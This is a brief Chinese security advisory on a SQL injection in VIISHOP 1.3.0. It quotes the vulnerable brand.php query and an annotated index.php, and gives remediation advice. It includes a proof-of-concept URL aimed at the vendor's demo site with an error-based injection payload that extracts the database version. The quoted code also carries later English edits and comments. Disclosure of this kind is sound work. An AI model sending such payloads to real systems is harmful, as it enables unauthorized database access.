
VIISHOP 1.3.0 SQL注入及修复

2013-05-24 15:11
/*******************************************************/

/* VIISHOP 1.3.0 SQL Injection Vulnerability

/* ========================

/* By: : Kn1f3

/* E-Mail : 681796@qq.com

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/

//index.php 首页文件


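// index.php — site entry point (home page file).
// Dispatcher as quoted from VIISHOP 1.3.0, with two corrections: eregi_replace()
// (removed in PHP 7.0) is replaced by an equivalent preg_replace() allowlist, and a
// non-string or empty "p" is rejected before it can reach include().
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
    // No page requested: fall back to the default "index" page.
    $GLOBALS['_REQUEST']['p'] = "index";
}
// A request such as "p[]=x" arrives as an array; treat anything that is not a
// string as an invalid page name instead of letting it be cast to "Array".
$page = is_string( $_REQUEST['p'] ) ? $_REQUEST['p'] : "";
// Legacy blacklist, kept so existing page names resolve exactly as before.
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $page );
// Allowlist: only letters, digits and underscore survive, so the name cannot leave system/.
$inc = (string) preg_replace( "/[^_a-zA-Z0-9]/", "", $inc );
// The include target is filtered; the files to review are the ones under system/.
// This filter only constrains WHICH script is loaded. It does not sanitize the
// request data those scripts go on to use (e.g. in the SQL they build).
if ( $inc === "" || !include( "system/{$inc}.php" ) )
{
    show_msg( "error_once", "index.php" );
}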



问题出在brand.php文件中


// brand.php, as quoted by the advisory: both interpolated variables reach the SQL text unmodified.
// NOTE(review): how a request value ends up in these globals (register_globals, or an
// import loop in common.inc.php) is not shown on this page — confirm against the full source.
// Remediation: assign $prefix from trusted configuration immediately before use, and pass
// $brand_id as a bound parameter if the $db wrapper supports it (otherwise validate it against
// the expected uid format) rather than interpolating it into the statement.
$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) ); // $prefix and $brand_id are not initialized and go into the query without any filtering



poc: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

 



 
修复方案:

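推荐80sec 的防注入代码 哈哈哈哈 (注意:通用防注入过滤只能作为临时缓解,可能被绕过;根本的修复是在 brand.php 中使用前先初始化 $prefix 和 $brand_id,并对 $brand_id 做参数化查询或严格的格式校验。)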
 

知识来源: www.2cto.com/Article/201305/214057.html
